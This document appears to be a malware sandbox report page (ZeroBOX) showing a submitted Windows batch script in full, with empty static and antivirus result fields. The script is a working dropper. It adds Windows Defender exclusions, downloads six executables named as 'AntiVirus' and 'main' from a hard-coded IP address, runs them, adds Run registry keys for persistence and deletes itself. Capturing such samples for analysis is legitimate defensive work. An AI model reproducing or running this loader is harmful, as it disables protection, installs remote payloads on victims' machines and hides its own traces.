popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
@echo off
REM Create a directory in C:\RM
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\Programlog'"
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\Programlog1'"
REM Exclude the C:\RM directory from Windows Defender scans
powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Programlog'"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Programlog1'"
REM Download the main.exe file to the C:\RM directory
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
Powershell -Command "Invoke-Webrequest 'http://45.88.91.103/LgGFdDAm/main.exe' -OutFile 'C:\Programlog\main.exe'"
Powershell -Command "Invoke-Webrequest 'http://45.88.91.103/LgGFdDAm/main2.exe' -OutFile 'C:\Programlog\main2.exe'"
REM Run the downloaded main.exe file
start "" "C:\RM\AntiVirus.exe"
start "" "C:\RM\AntiVirus2.exe"
start "" "C:\RM\AntiVirus3.exe"
start "" "C:\RM\AntiVirus4.exe"
start "" "C:\Programlog\main.exe"
start "" "C:\Programlog\main2.exe"
REM Add entry to the Windows Registry to run main.exe at startup
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\Programlog\main.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\Programlog\main2.exe" /f
REM Clean up temporary files (optional)
REM del %TEMP%\lander.vbs
REM Exit the script
(goto) 2>nul & del "%~f0"
No antivirus signatures available.
No IRMA results available.